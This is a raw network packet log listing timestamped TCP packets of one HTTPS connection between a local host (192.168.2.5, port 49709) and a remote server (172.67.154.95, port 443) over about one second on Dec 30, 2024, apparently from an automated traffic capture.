Dec 30, 2024 19:15:13.722906113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.722920895 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.722979069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.722987890 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.723033905 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.723634005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.723648071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.723700047 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.723706007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.724272013 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.731652975 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.731668949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.731703043 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.731712103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.731740952 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.732356071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.732369900 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.732402086 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.732408047 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.732431889 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.732439041 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.749049902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.749130964 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.751861095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.751874924 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.751946926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.751957893 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.752005100 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.756464958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.756485939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.756525040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.756531000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.756561995 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.784665108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.784683943 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.784735918 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.784748077 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.784775019 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.784796000 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.811242104 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811255932 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811321974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.811348915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811367989 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.811378956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.811851025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811863899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811923027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.811932087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.811965942 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.812417984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.812433004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.812489986 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.812494993 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.812594891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.820866108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.820879936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.820945978 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.820952892 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.821017981 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.837620974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.837635994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.837691069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.837701082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.837757111 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.840332985 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.840348005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.840409040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.840415001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.840476036 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.845105886 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.845120907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.845177889 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.845185995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.845220089 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.873804092 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.873819113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.873878956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.873884916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.873963118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.899941921 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.899965048 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.900027037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.900034904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.900077105 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.900722980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.900738001 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.900789976 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.900795937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.900855064 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.901237011 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.901257038 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.901299953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.901305914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.901324034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.901344061 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.910336971 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.910351992 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.910401106 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.910408020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.910438061 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.926188946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.926203966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.926244020 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.926250935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.926280975 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.929147005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.929162025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.929233074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.929238081 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.929333925 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.934041977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.934056997 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.934097052 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.934103012 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.934132099 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.934139013 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.962466002 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.962483883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.962539911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.962558985 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.962766886 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.988606930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.988626003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.988684893 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.988699913 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.988729954 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.989022017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989036083 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989080906 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.989092112 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989595890 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.989811897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989825964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989856958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.989861965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.989878893 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.989892960 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.998976946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.998991966 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.999043941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.999049902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.999085903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.014956951 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.014976025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.015070915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.015085936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.017519951 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.017545938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.017591000 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.017599106 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.017611027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.017641068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.022496939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.022511959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.022563934 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.022572994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.022584915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.022605896 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.051126003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.051151037 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.051244020 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.051275969 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.051724911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.077044010 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.077065945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.077161074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.077193975 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.077676058 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.077714920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.077887058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.077887058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.077887058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.077898979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.078453064 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.078465939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.078505993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.078515053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.078568935 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.087570906 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.087588072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.087640047 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.087662935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.087687016 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.088882923 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.104306936 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.104324102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.104392052 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.104413033 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.105696917 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.106234074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.106249094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.106298923 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.106306076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.109601974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.111011982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.111027002 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.111068964 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.111077070 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.113253117 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.139656067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.139671087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.139746904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.139764071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.141602039 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.171961069 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.171977043 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.172039032 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.172050953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.172099113 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.172986031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173000097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173033953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.173039913 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173063993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.173082113 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.173594952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173618078 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173639059 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.173645020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.173666954 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.173680067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.181852102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.181868076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.181912899 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.181921959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.181942940 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.181960106 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.192820072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.192832947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.192897081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.192913055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.193591118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.194798946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.194812059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.194855928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.194863081 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.194892883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.194905996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.199760914 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.199774027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.199825048 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.199832916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.199868917 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.228270054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.228285074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.228374958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.228398085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.229592085 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.260386944 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.260407925 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.260452032 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.260462999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.261055946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.261519909 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.261534929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.261579037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.261586905 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.262320995 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.262353897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.262371063 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.262381077 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.262404919 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.262428045 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.270185947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.270203114 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.270256996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.270263910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.270293951 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.281388044 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.281402111 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.281465054 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.281490088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.281596899 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.282488108 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.283391953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.283406973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.283461094 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.283468008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.284745932 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.288394928 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.288409948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.288461924 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.288480043 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.288501024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.289488077 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.317368031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.317389965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.317461967 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.317488909 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.317614079 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.349472046 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.349488020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.349559069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.349576950 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.349719048 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.350692034 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.350704908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.350752115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.350759983 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.351488113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.351504087 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.351531029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.351553917 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.351562977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.351574898 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.359364986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.359376907 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.359431028 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.359440088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.359473944 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.376648903 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.376665115 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.376734018 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.376740932 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.376785994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.379158974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.379173994 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.379232883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.379241943 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.381602049 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.384270906 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.384285927 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.384344101 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.384349108 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.384380102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.407202959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.407221079 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.407275915 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.407286882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.407320976 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.438152075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.438170910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.438247919 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.438266039 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.439090967 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.439110041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.439165115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:14.439177036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:14.439187050 CET	49709	443	192.168.2.5	172.67.154.95
